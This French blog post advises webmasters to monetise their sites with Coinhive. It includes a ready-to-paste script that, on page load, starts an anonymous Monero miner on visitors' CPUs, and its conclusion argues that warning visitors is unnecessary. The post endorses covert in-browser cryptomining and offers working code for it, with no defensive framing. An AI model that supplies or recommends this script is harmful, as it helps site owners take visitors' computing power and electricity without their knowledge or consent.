Webmaster, monétiser intelligemment votre site

Webmaster amateur ou professionnel passe par la même étape : la monétisation de son site. A différente échelle, bien entendu. le premier souhaitera gagner quelques euros pour rembourser sa consommation électrique, son nom de domaine alors que le second voudra générer un revenu.

Mais dans les deux cas, générer de l’argent ne doit pas se faire au dépend de l’internaute, ni de l’esthétique du site. Malheureusement, il est tentant de charger ses pages de publicités, il y aura donc plus de sources de revenu sur la page mais il se  passera principalement trois choses :

  • rendre illisible les pages
  • faire fuir les internautes
  • faire chuter le référencement

Cela est donc compliqué de trouver un juste milieu

Cas de Pirate Bay

En aucun cas je vais faire un débat sur les activités de Pirate Bay, en revanche, après avoir lu cette article sur 01net.com et l’article de Korben,

Pour résumer, le site Pirate Bay a mis en place un script qui permet de miner de la crypto-monnaie en utilisant les ressources de ses visiteurs.

Ce script permet simplement de rajouter dans un pool (ensemble de système) un pourcentage de la puissance du CPU des visiteurs afin de générer de la crypto-monnaie (dans ce cas de la Monero). Cela demande de plus en plus de puissance de calcul et il est fréquent de faire travailler ensemble plusieurs machines.

Ah mais utiliser des ressources des gens sans leur dire, c’est mal !!!!

Mon avis

Après mettre renseigné sur cette pseudo-affaire, j’ai voulu tester de mon côté si cela est vraiment gênant pour l’internaute, j’ai donc testé la solution, au final, je suis convaincu, il s’agit bien entendu de quelque-chose de subjectif, mais pour ceux qui sont déjà venu sur ce site, je ne pense pas que vous trouvez que votre ordinateur ralentisse.

Bien entendu, il ne faut pas être trop gourmand, comme pour les publicités, il faut choisir un juste milieu.

Comment faire pour miner avec son site : coinhive

Voià, le but n’était pas de vous convaincre, mais simplement expliquer pourquoi je trouve qu’il s’agit d’une vraie solution.

Mais avant tout …

Tout d’abord, j’ai commencé par supprimer des pubs (merci à ceux qui n’activent pas leur ad-block sur mon site, vous avez certainement vu disparaître : un volet latéral et une bannière de sortie.

et oui, il ne faut pas être trop gourmand, du coup, j’ai gagné un peu en esthétique en supprimant deux éléments laids et en temps de chargement (deux scripts en moins)

Installation de coinhive

Quand j’écris installation, vous allez voir que ce n’est pas très compliqué, commencez par vous rendre sur le site coinhive.com, puis créer un compte (avec un mail valide).

Rendez-vous dans Settings / Site & API Keys et ajouter votre site (www.mon-site.com), relevez ensuite votre clé publique.

Je ne vais que parler du minage de base, en mode anonyme (attention, cela veut simplement dire que nous n’allons pas avoir les informations sur l’utilisateur qui mine).

il existe d’autre outils, je vous invite à aller les voir

Je vais vous faire un petit cadeau, voici le script à insérer dans vos pages (de préférence en fin de page) :

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('YOUR_SITE_KEY');
        miner.setThrottle(0.2);
  miner.start();
</script>

Et … C’est tout, pensez à mettre votre clé public et surtout à jouer le jeu et ne pas être trop gourmand.

Conclusion

Nous avons maintenant un moyen de rémunération qui est bien plus respectueuse que des pubs intrusives, la question « Doit-on avertir l’internaute ? » et je pense inutile, au final, que les ressources soient utilisées par des scripts pour afficher des pubs et par l’ad-block pour les bloquer ou utilisées par le script de minage est identique (à condition de ne pas ponctionner toutes les ressources), elle est même beaucoup plus respectueuse pour l’internaute.

Laisser un commentaire